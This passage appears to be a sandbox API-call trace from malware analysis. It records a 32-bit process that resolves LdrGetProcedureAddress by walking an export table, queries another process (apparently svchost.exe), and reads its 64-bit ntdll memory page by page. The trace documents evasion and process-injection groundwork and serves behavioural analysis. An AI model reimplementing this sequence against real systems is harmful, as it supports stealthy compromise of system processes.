lstrcmpA (lpString1="LdrAppxHandleIntegrityFailure", lpString2="LdrGetProcedureAddress") returned -1 [0207.183] lstrcmpA (lpString1="LdrDisableThreadCalloutsForDll", lpString2="LdrGetProcedureAddress") returned -1 [0207.183] lstrcmpA (lpString1="LdrEnumResources", lpString2="LdrGetProcedureAddress") returned -1 [0207.183] lstrcmpA (lpString1="LdrEnumerateLoadedModules", lpString2="LdrGetProcedureAddress") returned -1 [0207.183] lstrcmpA (lpString1="LdrFastFailInLoaderCallout", lpString2="LdrGetProcedureAddress") returned -1 [0207.183] lstrcmpA (lpString1="LdrFindEntryForAddress", lpString2="LdrGetProcedureAddress") returned -1 [0207.183] lstrcmpA (lpString1="LdrFindResourceDirectory_U", lpString2="LdrGetProcedureAddress") returned -1 [0207.183] lstrcmpA (lpString1="LdrFindResourceEx_U", lpString2="LdrGetProcedureAddress") returned -1 [0207.183] lstrcmpA (lpString1="LdrFindResource_U", lpString2="LdrGetProcedureAddress") returned -1 [0207.183] lstrcmpA (lpString1="LdrFlushAlternateResourceModules", lpString2="LdrGetProcedureAddress") returned -1 [0207.183] lstrcmpA (lpString1="LdrGetDllDirectory", lpString2="LdrGetProcedureAddress") returned -1 [0207.183] lstrcmpA (lpString1="LdrGetDllFullName", lpString2="LdrGetProcedureAddress") returned -1 [0207.183] lstrcmpA (lpString1="LdrGetDllHandle", lpString2="LdrGetProcedureAddress") returned -1 [0207.184] lstrcmpA (lpString1="LdrGetDllHandleByMapping", lpString2="LdrGetProcedureAddress") returned -1 [0207.184] lstrcmpA (lpString1="LdrGetDllHandleByName", lpString2="LdrGetProcedureAddress") returned -1 [0207.184] lstrcmpA (lpString1="LdrGetDllHandleEx", lpString2="LdrGetProcedureAddress") returned -1 [0207.184] lstrcmpA (lpString1="LdrGetDllPath", lpString2="LdrGetProcedureAddress") returned -1 [0207.184] lstrcmpA (lpString1="LdrGetFailureData", lpString2="LdrGetProcedureAddress") returned -1 [0207.184] lstrcmpA (lpString1="LdrGetFileNameFromLoadAsDataTable", lpString2="LdrGetProcedureAddress") returned -1 [0207.184] lstrcmpA (lpString1="LdrGetKnownDllSectionHandle", lpString2="LdrGetProcedureAddress") returned -1 [0207.184] lstrcmpA (lpString1="LdrGetProcedureAddress", lpString2="LdrGetProcedureAddress") returned 0 [0207.184] VirtualFree (lpAddress=0x2860000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0207.191] GetModuleHandleA (lpModuleName="NTDLL.DLL") returned 0x779b0000 [0207.191] GetProcAddress (hModule=0x779b0000, lpProcName="ZwWow64QueryInformationProcess64") returned 0x77a1a840 [0207.191] NtWow64QueryInformationProcess64 (in: ProcessHandle=0x1dc, ProcessInformationClass=0x0, ProcessInformation64=0x1eaf4f4, ProcessInformationLength=0x30, ReturnLength=0x1eaf548 | out: ProcessInformation64=0x1eaf4f4, ReturnLength=0x1eaf548) returned 0x0 [0207.192] VirtualAlloc (lpAddress=0x0, dwSize=0x6c4, flAllocationType=0x3000, flProtect=0x4) returned 0x160000 [0207.192] GetModuleHandleA (lpModuleName="NTDLL.DLL") returned 0x779b0000 [0207.192] GetProcAddress (hModule=0x779b0000, lpProcName="ZwWow64QueryInformationProcess64") returned 0x77a1a840 [0207.192] NtWow64QueryInformationProcess64 (in: ProcessHandle=0x1dc, ProcessInformationClass=0x0, ProcessInformation64=0x1eaf4f4, ProcessInformationLength=0x30, ReturnLength=0x1eaf548 | out: ProcessInformation64=0x1eaf4f4, ReturnLength=0x1eaf548) returned 0x0 [0207.192] StrRChrA (lpStart="C:\\Windows\\system32\\svchost.exe", lpEnd=0x0, wMatch=0x5c) returned="\\svchost.exe" [0207.192] StrRChrA (lpStart="C:\\Windows\\SYSTEM32\\ntdll.dll", lpEnd=0x0, wMatch=0x5c) returned="\\ntdll.dll" [0207.192] StrRChrA (lpStart="C:\\Windows\\system32\\KERNEL32.DLL", lpEnd=0x0, wMatch=0x5c) returned="\\KERNEL32.DLL" [0207.192] StrRChrA (lpStart="C:\\Windows\\system32\\KERNELBASE.dll", lpEnd=0x0, wMatch=0x5c) returned="\\KERNELBASE.dll" [0207.193] StrRChrA (lpStart="C:\\Windows\\system32\\sechost.dll", lpEnd=0x0, wMatch=0x5c) returned="\\sechost.dll" [0207.193] StrRChrA (lpStart="C:\\Windows\\system32\\RPCRT4.dll", lpEnd=0x0, wMatch=0x5c) returned="\\RPCRT4.dll" [0207.193] lstrcmpiA (lpString1="svchost.exe", lpString2="NTDLL.DLL") returned 1 [0207.193] StrChrA (lpStart="svchost.exe", wMatch=0x2e) returned=".exe" [0207.193] lstrcmpiA (lpString1="svchost", lpString2="NTDLL.DLL") returned 1 [0207.193] lstrcmpiA (lpString1="ntdll.dll", lpString2="NTDLL.DLL") returned 0 [0207.193] VirtualFree (lpAddress=0x160000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0207.193] VirtualAlloc (lpAddress=0x0, dwSize=0x1c2000, flAllocationType=0x3000, flProtect=0x4) returned 0x2860000 [0207.193] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f30000, Buffer=0x7ff9, BufferSize=0x2860000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.193] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f31000, Buffer=0x7ff9, BufferSize=0x2861000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.193] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f32000, Buffer=0x7ff9, BufferSize=0x2862000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.193] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f33000, Buffer=0x7ff9, BufferSize=0x2863000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.193] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f34000, Buffer=0x7ff9, BufferSize=0x2864000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.194] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f35000, Buffer=0x7ff9, BufferSize=0x2865000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.194] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f36000, Buffer=0x7ff9, BufferSize=0x2866000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.194] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f37000, Buffer=0x7ff9, BufferSize=0x2867000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.194] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f38000, Buffer=0x7ff9, BufferSize=0x2868000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.194] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f39000, Buffer=0x7ff9, BufferSize=0x2869000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.194] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f3a000, Buffer=0x7ff9, BufferSize=0x286a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.194] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f3b000, Buffer=0x7ff9, BufferSize=0x286b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.194] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f3c000, Buffer=0x7ff9, BufferSize=0x286c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.194] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f3d000, Buffer=0x7ff9, BufferSize=0x286d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.195] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f3e000, Buffer=0x7ff9, BufferSize=0x286e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.195] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f3f000, Buffer=0x7ff9, BufferSize=0x286f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.195] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f40000, Buffer=0x7ff9, BufferSize=0x2870000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.195] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f41000, Buffer=0x7ff9, BufferSize=0x2871000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.195] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f42000, Buffer=0x7ff9, BufferSize=0x2872000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.195] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f43000, Buffer=0x7ff9, BufferSize=0x2873000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.195] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f44000, Buffer=0x7ff9, BufferSize=0x2874000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.195] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f45000, Buffer=0x7ff9, BufferSize=0x2875000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.195] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f46000, Buffer=0x7ff9, BufferSize=0x2876000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.196] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f47000, Buffer=0x7ff9, BufferSize=0x2877000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.196] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f48000, Buffer=0x7ff9, BufferSize=0x2878000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.196] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f49000, Buffer=0x7ff9, BufferSize=0x2879000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.196] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f4a000, Buffer=0x7ff9, BufferSize=0x287a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.196] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f4b000, Buffer=0x7ff9, BufferSize=0x287b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.196] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f4c000, Buffer=0x7ff9, BufferSize=0x287c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.196] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f4d000, Buffer=0x7ff9, BufferSize=0x287d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.196] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f4e000, Buffer=0x7ff9, BufferSize=0x287e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.196] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f4f000, Buffer=0x7ff9, BufferSize=0x287f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.197] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f50000, Buffer=0x7ff9, BufferSize=0x2880000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.197] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f51000, Buffer=0x7ff9, BufferSize=0x2881000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.197] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f52000, Buffer=0x7ff9, BufferSize=0x2882000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.197] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f53000, Buffer=0x7ff9, BufferSize=0x2883000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.197] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f54000, Buffer=0x7ff9, BufferSize=0x2884000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.197] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f55000, Buffer=0x7ff9, BufferSize=0x2885000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.197] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f56000, Buffer=0x7ff9, BufferSize=0x2886000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.197] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f57000, Buffer=0x7ff9, BufferSize=0x2887000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.197] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f58000, Buffer=0x7ff9, BufferSize=0x2888000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.198] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f59000, Buffer=0x7ff9, BufferSize=0x2889000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.198] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f5a000, Buffer=0x7ff9, BufferSize=0x288a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.198] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f5b000, Buffer=0x7ff9, BufferSize=0x288b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.198] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f5c000, Buffer=0x7ff9, BufferSize=0x288c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.198] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f5d000, Buffer=0x7ff9, BufferSize=0x288d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.198] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f5e000, Buffer=0x7ff9, BufferSize=0x288e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.198] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f5f000, Buffer=0x7ff9, BufferSize=0x288f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.198] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f60000, Buffer=0x7ff9, BufferSize=0x2890000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.198] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f61000, Buffer=0x7ff9, BufferSize=0x2891000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.199] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f62000, Buffer=0x7ff9, BufferSize=0x2892000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.199] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f63000, Buffer=0x7ff9, BufferSize=0x2893000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.199] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f64000, Buffer=0x7ff9, BufferSize=0x2894000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.199] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f65000, Buffer=0x7ff9, BufferSize=0x2895000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.199] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f66000, Buffer=0x7ff9, BufferSize=0x2896000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.199] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f67000, Buffer=0x7ff9, BufferSize=0x2897000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.199] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f68000, Buffer=0x7ff9, BufferSize=0x2898000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.199] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f69000, Buffer=0x7ff9, BufferSize=0x2899000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.200] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f6a000, Buffer=0x7ff9, BufferSize=0x289a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.200] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f6b000, Buffer=0x7ff9, BufferSize=0x289b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.200] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f6c000, Buffer=0x7ff9, BufferSize=0x289c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.200] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f6d000, Buffer=0x7ff9, BufferSize=0x289d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.200] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f6e000, Buffer=0x7ff9, BufferSize=0x289e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.200] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f6f000, Buffer=0x7ff9, BufferSize=0x289f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.201] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f70000, Buffer=0x7ff9, BufferSize=0x28a0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.201] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f71000, Buffer=0x7ff9, BufferSize=0x28a1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.201] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f72000, Buffer=0x7ff9, BufferSize=0x28a2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.201] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f73000, Buffer=0x7ff9, BufferSize=0x28a3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.201] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f74000, Buffer=0x7ff9, BufferSize=0x28a4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.201] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f75000, Buffer=0x7ff9, BufferSize=0x28a5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.201] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f76000, Buffer=0x7ff9, BufferSize=0x28a6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.201] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f77000, Buffer=0x7ff9, BufferSize=0x28a7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.201] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f78000, Buffer=0x7ff9, BufferSize=0x28a8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.202] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f79000, Buffer=0x7ff9, BufferSize=0x28a9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.202] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f7a000, Buffer=0x7ff9, BufferSize=0x28aa000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.202] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f7b000, Buffer=0x7ff9, BufferSize=0x28ab000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.202] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f7c000, Buffer=0x7ff9, BufferSize=0x28ac000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.202] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f7d000, Buffer=0x7ff9, BufferSize=0x28ad000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.202] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f7e000, Buffer=0x7ff9, BufferSize=0x28ae000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.202] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f7f000, Buffer=0x7ff9, BufferSize=0x28af000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.202] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f80000, Buffer=0x7ff9, BufferSize=0x28b0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.203] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f81000, Buffer=0x7ff9, BufferSize=0x28b1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.203] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f82000, Buffer=0x7ff9, BufferSize=0x28b2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.203] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f83000, Buffer=0x7ff9, BufferSize=0x28b3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.203] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f84000, Buffer=0x7ff9, BufferSize=0x28b4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.203] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f85000, Buffer=0x7ff9, BufferSize=0x28b5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.203] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f86000, Buffer=0x7ff9, BufferSize=0x28b6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.203] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f87000, Buffer=0x7ff9, BufferSize=0x28b7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.203] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f88000, Buffer=0x7ff9, BufferSize=0x28b8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.203] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f89000, Buffer=0x7ff9, BufferSize=0x28b9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.203] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f8a000, Buffer=0x7ff9, BufferSize=0x28ba000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.204] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f8b000, Buffer=0x7ff9, BufferSize=0x28bb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.204] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f8c000, Buffer=0x7ff9, BufferSize=0x28bc000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.204] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f8d000, Buffer=0x7ff9, BufferSize=0x28bd000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.204] 